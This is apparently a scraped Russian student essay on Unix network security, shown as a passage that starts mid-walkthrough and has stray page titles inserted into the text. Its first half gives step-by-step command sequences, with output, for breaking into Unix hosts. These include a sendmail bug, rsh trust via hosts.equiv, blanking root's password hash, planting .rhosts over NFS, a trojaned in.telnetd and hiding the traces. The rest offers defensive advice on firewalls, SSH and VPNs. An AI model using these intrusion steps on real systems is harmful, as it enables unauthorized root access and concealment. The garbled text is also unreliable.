Вводим заранее неправильного адресата 500 nosuchuser: user unknown! Несмотря на сообщение, продолжаем диалог. Data 230 Enter mail, end with. 200 Mail accepted! Все, машина взломана.
Quit crack% su! А теперь залезаем так, чтобы нас не было видно через who # rsh target.remote.com /bin/csh i Welcome to remote.com!
No access to terminal, job control disabled! Target# Эта ошибка присутствует в нескольких десятках различных вариантов ОС Unix самых разных фирм. Кроме того, существуют и более простые способы при благоприятных условиях: удаленная машина Sun, система SunOS 4, NIS не запущен, система поставлена, и ничего не исправлялось. ПРИМЕР 2 crack# su bin $ rsh target.remote.com /bin/csh i! В файле /etc/hosts.equiv есть запись + и ошибка Welcome to remote.com!! Каталог /etc с владельцем bin Warning! No access to terminal, job control disabled!% ls -ldg /etc drwxr-xr-x 10 bin bin 1536 Apr 10 01:45 /etc/% cd /etc!
Делаем passwd доступным на запись нам% mv passwd passwd.was% cp passwd.was passwd! Редактируем% ed passwd 2341 1p root:Nkkh5gkljGyj:0:0:Root:/:/bin/csh s/Nkkh5gkljGyj//p root::0:0:Root:/:/bin/csh w 2341 q! И в суперпользователя.%echo /bin/csh -i su root Warning!
No access to terminal, job control disabled! Target# mv /etc/passwd.was /etc/passwd! Чтобы никто не обнаружил, что мы делали. Кроме электронной почты в TCP/IP сетях очень широко применяются различные виды распределенных файловых систем, самой популярной из которых является Network File System (NFS). В случае неаккуратного заполнения файла /etc/exports или использования дистрибутива с ошибкой (SunOS 4.1) может возникнуть следующая ситуация.
ПРИМЕР 3 crack% showmount -e target.remote.com Export list for target.remote.com /home Everyone /disk3 neptun pluton alpha! Домашние каталоги доступны по NFS crack% su # mount -t nfs target.remote.com:/home /mnt # cd /mnt!
Монтируем каталог к нам # ls -ldg. drwxr-xr-x 10 2 Apr 10 01:45 user/ # echo crack.edu user/.rhosts!
Устанавливаем.rhosts у пользователя # cath /etc/passwd user::257:20::/: ^D! Создаем такого же у нас # su user!
Становимся им $ rsh target.remote.com /bin/csh i Warning! No access to terminal, job control disabled!! И заходим на удаленную машину% id uid=257(user) gid=20(stuff) groups=20(stuff), 7(sys)% ls -ldg /usr/etc!
Каталог доступен на запись drwxrw-xr-x 10 bin bin 1536 Apr 10 01:45 /usr/etc% grep telnet /etc/inetd.conf telnet stream nowait root /usr/etc/in.telnetd in.telnetd! Нашли программу, которая запустится!под root»ом из нашего каталога% cd /usr/etc% mv in.telnetd in.telnetd1!
Создаем троянского коня% catЋ in.telnetd #!/bin/sh exec /bin/csh i ^D% chmod 755 in.telnetd! И запускаем его% telnet 127.1 Connecting 127.1. No access to terminal, job control disabled! # chown user /etc;! Делаем /etc своим ^M: command not found # exit; ^M: command not found Connection closed by foreign host.% cd /etc!
И далее как раньше как в примере 1. Обеспечение безопасности Ниже описаны некоторые известные уязвимые места ОС семейства UNIX и способы защиты. Провокация отказа в обслуживании. Атакуемая система выводится за рамки штатных режимов работы отправкой некорректных IP пакетов или организацией слишком интенсивного потока пакетов. Всегда используйте последнюю версию брандмауэра и следите за рекомендациями специалистов. Хакер пытается внедриться в механизм осуществления транзакций, чтобы завладеть идентификационными данными ее участников для последующего перехвата электронной почты, номеров кредитных карточек или иной конфиденциальной информации. Механизм SSH (Secure Shell) позволяет выполнять на сервере аутентификацию доступа с помощью алгоритма RSA, благодаря чему подобные атаки практически не имеют шанса на успех.
Фальсификация IPадресов. Использование посторонними внутреннего или внешнего IPадреса для обхода систем защиты. Большинство брандмауэров способны обнаруживать и предотвращать фальсификацию IPадресов. Установите брандмауэр и маршрутизатор с функцией фильтрации пакетов, а где возможно, внедрите более строгие механизмы аутентификации. Прослушивание сети.
Хакер может воспользоваться анализатором сетевых протоколов или иным подобным средством для перехвата сетевого трафика и извлечения из него конфиденциальных данных. Виртуальная частная сеть (VPN) способна служить зашифрованным каналом передачи данных. Организовать на платформе Linux виртуальную частную сеть с шифрованием по стандарту IPSec позволяет бесплатное ПО Free S/WAN. Использование идентификационных данных зарегистрированного пользователя. Хакер, заполучивший какимлибо образом IP-адрес и пароль, открывающие доступ в систему, может выдать себя за зарегистрированного пользователя.

Операционные Системы Windows
Распространите цифровые сертификаты на уровне приложений. Один из возможных вариантов — применение защищенного Web-сервера Apache-SSL, основанного на спецификации SSLeay/OpenSSL. Он поддерживает цифровые сертификаты, эмитирован-ные самыми разными источниками. Заключение В свете вышеизложенного возникает вопрос: какие меры защиты сетей наиболее эффективны? В первую очередь, на ум приходит применение брандмауэров.
Главное, это выбрать брандмауэр, соответствующий тому, в какой степени ваша сеть зависит от Internet. На сегодняшний день широкое распро-странение получили два типа брандмауэров: использующих фильтрацию пакетов и работающих на уровне приложений. Начали также появляться продукты, в которых в различной степени применяются обе технологии. Итак, существуют две технологии защиты сетей. Первая представляет собой исследование входящих и выходящих пакетов на предмет того, откуда — куда они направляются и какой тип соединения устанавливают.
Недостатки этого подхода: очевидно, что он практически бессилен перед подделкой IP-адреса пассивным и, тем более, активным сниффингом, привязка же к конкретным хостам (IP-адресам) ограничивает возможности удаленных пользователей. Применение брандмауэров такого типа сети, в которых Internet используется только «изнутри», где отсутствует связь с внешними сетями, и, безусловно, все пользователи в достаточной мере облечены доверием. Брандмауэр будет наглухо закрывать доступ извне: его можно также применять для предотвращения злоупотребления Internet сотрудниками компании.
Операционная Система Unix Реферат
Брандмауэры, работающие на уровне приложений, предполагают наличие шлюза для каждого приложения, а также аутентификацию (с использованием) при любом соединении. Такой подход позволяет отказаться от проверки IP-адресов, но взамен требует наличие шлюза для каждого приложения, что представляется довольно серьезным ограничением. Насколько эффективна эта технология? Она, очевидно, устойчива перед пассивным сниффингом и подделкой адреса, но в любом случае надежность подобной защиты от активного сниффинга не может быть стопроцентной. Брандмауэры, по сути дела, предохраняют сеть только от случайной утечки информации и проникновения в нее, так сказать, первого встречного, что, впрочем, раз в десять снижает риск потери конфиденциальности хранимой и передаваемой информации и нарушения работоспособности информационной системы. Единственное же, что может гарантировать безопасность от «подслушивания» — шифрование всех внутренних (не говоря уже о внешних) потоков данных в сети и организация дополнительных уровней аутентификации. Все это не исключает возможности перехвата пакетов сниффером, но, в то же время, не дает взломщику воспользоваться перехваченной информацией.
Операционная Система Unix 2 Издание Pdf
Определение необходимой степени защиты информации осуществляется при помощи несложных математических оценок: вероятность взлома умножается на размер возможного ущерба и на основе полученной величины определяются средства, которые требуется выделить на обеспечение соответствующих мер безопасности.